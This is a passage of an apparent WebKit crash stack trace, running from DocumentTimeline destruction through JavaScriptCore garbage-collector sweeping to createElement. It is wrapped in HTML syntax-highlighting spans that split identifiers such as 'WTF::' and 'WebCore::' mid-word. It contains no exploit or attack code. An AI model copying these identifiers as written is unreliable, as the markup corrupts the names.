class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>find(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) const DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">209</span><br> #<span class="hljs-number">6</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>remove(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">286</span><br> #<span class="hljs-number">7</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in bool WT<span class="hljs-number">F::</span>WeakHashSet<WebCor<span class="hljs-number">e::</span>DocumentTimeline><span class="hljs-number">::</span>remove<WebCor<span class="hljs-number">e::</span>DocumentTimeline>(WebCor<span 
class="hljs-number">e::</span>DocumentTimeline const&) DerivedSources/ForwardingHeaders/wtf/WeakHashSet.h:<span class="hljs-number">112</span><br> #<span class="hljs-number">8</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>removeTimeline(WebCor<span class="hljs-number">e::</span>DocumentTimeline&) Source/WebCore/dom/Document.cpp:<span class="hljs-number">8064</span><br> #<span class="hljs-number">9</span> <span class="hljs-number">0</span>x7fbd04fb36ce in WebCor<span class="hljs-number">e::</span>DocumentTimeline::~DocumentTimeline() Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">80</span><br> #<span class="hljs-number">10</span> <span class="hljs-number">0</span>x7fbd04fb3dd0 in WebCor<span class="hljs-number">e::</span>DocumentTimeline::~DocumentTimeline() Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">81</span><br> #<span class="hljs-number">11</span> <span class="hljs-number">0</span>x7fbd0598f70f in st<span class="hljs-number">d::</span>default_delete<WebCor<span class="hljs-number">e::</span>AnimationTimeline><span class="hljs-number">::</span>operator()(WebCor<span class="hljs-number">e::</span>AnimationTimeline*) const /usr/include/c++/<span class="hljs-number">7</span>/bits/unique_ptr.h:<span class="hljs-number">78</span><br> #<span class="hljs-number">12</span> <span class="hljs-number">0</span>x7fbd0598f70f in WT<span class="hljs-number">F::</span>RefCounted<WebCor<span class="hljs-number">e::</span>AnimationTimeline, st<span class="hljs-number">d::</span>default_delete<WebCor<span class="hljs-number">e::</span>AnimationTimeline> ><span class="hljs-number">::</span>deref() const DerivedSources/ForwardingHeaders/wtf/RefCounted.h:<span class="hljs-number">190</span><br> #<span class="hljs-number">13</span> <span class="hljs-number">0</span>x7fbd0598f70f in void WT<span 
class="hljs-number">F::</span>derefIfNotNull<WebCor<span class="hljs-number">e::</span>DocumentTimeline>(WebCor<span class="hljs-number">e::</span>DocumentTimeline*) DerivedSources/ForwardingHeaders/wtf/RefPtr.h:<span class="hljs-number">44</span><br> #<span class="hljs-number">14</span> <span class="hljs-number">0</span>x7fbd0598f70f in WT<span class="hljs-number">F::</span>RefPtr<WebCor<span class="hljs-number">e::</span>DocumentTimeline, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>DocumentTimeline> >::~RefPtr() DerivedSources/ForwardingHeaders/wtf/RefPtr.h:<span class="hljs-number">70</span><br> #<span class="hljs-number">15</span> <span class="hljs-number">0</span>x7fbd0598f70f in WebCor<span class="hljs-number">e::</span>Document::~Document() Source/WebCore/dom/Document.cpp:<span class="hljs-number">628</span><br> #<span class="hljs-number">16</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6574</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">17</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6660</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">18</span> <span class="hljs-number">0</span>x7fbd0599b49c in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>removedLastRef() Source/WebCore/dom/Document.cpp:<span class="hljs-number">766</span><br> #<span class="hljs-number">19</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05b2a2a7</span> in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>removedLastRef() Source/WebCore/dom/Node.cpp:<span class="hljs-number">2533</span><br> #<span 
class="hljs-number">20</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>deref() const Source/WebCore/dom/Node.h:<span class="hljs-number">716</span><br> #<span class="hljs-number">21</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>derefEventTarget() Source/WebCore/dom/Node.cpp:<span class="hljs-number">825</span><br> #<span class="hljs-number">22</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>deref() Source/WebCore/dom/EventTarget.h:<span class="hljs-number">58</span><br> #<span class="hljs-number">23</span> <span class="hljs-number">0</span>x7fbd038f70cd in WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>EventTarget, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>EventTarget> >::~Ref() DerivedSources/ForwardingHeaders/wtf/Ref.h:<span class="hljs-number">61</span><br> #<span class="hljs-number">24</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSDOMWrapper<WebCor<span class="hljs-number">e::</span>EventTarget>::~JSDOMWrapper() Source/WebCore/bindings/js/JSDOMWrapper.h:<span class="hljs-number">71</span><br> #<span class="hljs-number">25</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget::~JSEventTarget() DerivedSources/WebCore/JSEventTarget.h:<span class="hljs-number">30</span><br> #<span class="hljs-number">26</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget<span class="hljs-number">::</span>destroy(JS<span class="hljs-number">C::</span>JSCell*) DerivedSources/WebCore/JSEventTarget.cpp:<span class="hljs-number">234</span><br> 
#<span class="hljs-number">27</span> <span class="hljs-number">0</span>x7fbcfb288c7c in JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFun<span class="hljs-number">c::</span>operator()(JS<span class="hljs-number">C::</span>VM&, JS<span class="hljs-number">C::</span>JSCell*) const Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">37</span><br> #<span class="hljs-number">28</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span 
class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(void*)#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()(void*) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">260</span><br> #<span class="hljs-number">29</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span 
class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(unsigned long)#<span class="hljs-number">3</span>}<span class="hljs-number">::</span>operator()(unsigned long) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">319</span><br> #<span class="hljs-number">30</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span 
class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">341</span><br> 
#<span class="hljs-number">31</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">423</span><br> #<span class="hljs-number">32</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">435</span><br> #<span class="hljs-number">33</span> <span class="hljs-number">0</span>x7fbcfb266d9b in JS<span class="hljs-number">C::</span>JSDestructibleObjectHeapCellTyp<span class="hljs-number">e::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">52</span><br> #<span class="hljs-number">34</span> <span class="hljs-number">0</span>x7fbcfa4f4c96 in JS<span class="hljs-number">C::</span>Subsp<span class="hljs-number">ace::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/Subspace.cpp:<span 
class="hljs-number">64</span><br> #<span class="hljs-number">35</span> <span class="hljs-number">0</span>x7fbcfa4c9381 in JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>sweep(JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/MarkedBlock.cpp:<span class="hljs-number">419</span><br> #<span class="hljs-number">36</span> <span class="hljs-number">0</span>x7fbcfa48459c in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateIn(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle*) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">226</span><br> #<span class="hljs-number">37</span> <span class="hljs-number">0</span>x7fbcfa484d0a in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateWithoutCollecting() Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">192</span><br> #<span class="hljs-number">38</span> <span class="hljs-number">0</span>x7fbcfa48e44e in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocateSlowCase(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">133</span><br> #<span class="hljs-number">39</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const 
DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">40</span><br> #<span class="hljs-number">40</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>HeapCell* JS<span class="hljs-number">C::</span>FreeList<span class="hljs-number">::</span>allocate<JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}>(JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>} const&) DerivedSources/ForwardingHeaders/JavaScriptCore/FreeListInlines.h:<span class="hljs-number">46</span><br> #<span class="hljs-number">41</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">41</span><br> #<span class="hljs-number">42</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>Allocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) const DerivedSources/ForwardingHeaders/JavaScriptCore/AllocatorInlines.h:<span class="hljs-number">35</span><br> #<span 
class="hljs-number">43</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>CompleteSubsp<span class="hljs-number">ace::</span>allocateNonVirtual(JS<span class="hljs-number">C::</span>VM&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/CompleteSubspaceInlines.h:<span class="hljs-number">39</span><br> #<span class="hljs-number">44</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>tryAllocateCellHelper<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">163</span><br> #<span class="hljs-number">45</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>allocateCell<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">177</span><br> #<span class="hljs-number">46</span> <span class="hljs-number">0</span>x7fbd03af7167 in WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement<span class="hljs-number">::</span>create(JS<span class="hljs-number">C::</span>Structure*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) DerivedSources/WebCore/JSHTMLScriptElement.h:<span class="hljs-number">35</span><br> #<span class="hljs-number">47</span> 
<span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>value, WebCor<span class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">187</span><br> #<span class="hljs-number">48</span> <span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<!st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement><span class="hljs-number">::</span>value, WebCor<span class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span 
class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">194</span><br> #<span class="hljs-number">49</span> <span class="hljs-number">0</span>x7fbd03af7167 in createHTMLScriptElementWrapper DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">527</span><br> #<span class="hljs-number">50</span> <span class="hljs-number">0</span>x7fbd03b10e86 in WebCor<span class="hljs-number">e::</span>createJSHTMLWrapper(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">795</span><br> #<span class="hljs-number">51</span> <span class="hljs-number">0</span>x7fbd0511cd70 in createNewElementWrapper Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">55</span><br> #<span class="hljs-number">52</span> <span class="hljs-number">0</span>x7fbd0511cd70 in WebCor<span class="hljs-number">e::</span>toJSNewlyCreated(JS<span class="hljs-number">C::</span>JSGlobalObject*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">77</span><br> #<span class="hljs-number">53</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span class="hljs-number">e::</span>JSConverter<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element> ><span 
class="hljs-number">::</span>convertNewlyCreated<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertInterface.h:<span class="hljs-number">87</span><br> #<span class="hljs-number">54</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">162</span><br> #<span class="hljs-number">55</span> <span class="hljs-number">0</span>x7fbd037ec467 in st<span class="hljs-number">d::</span>enable_if<WebCor<span class="hljs-number">e::</span>IsExceptionOr<WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span 
class="hljs-number">e::</span>Element> > > ><span class="hljs-number">::</span>value, JS<span class="hljs-number">C::</span>JSValue><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, JS<span class="hljs-number">C::</span>ThrowScope&, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">202</span><br> #<span class="hljs-number">56</span> <span class="hljs-number">0</span>x7fbd037ec467 in jsDocumentPrototypeFunctionCreateElementBody DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5071</span><br> #<span class="hljs-number">57</span> <span class="hljs-number">0</span>x7fbd037ec467 in call<WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElementBody> Source/WebCore/bindings/js/JSDOMOperation.h:<span class="hljs-number">53</span><br> #<span class="hljs-number">58</span> <span class="hljs-number">0</span>x7fbd037ec467 in WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElement(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>CallFrame*) DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5076</span><br> #<span class="hljs-number">59</span> <span 
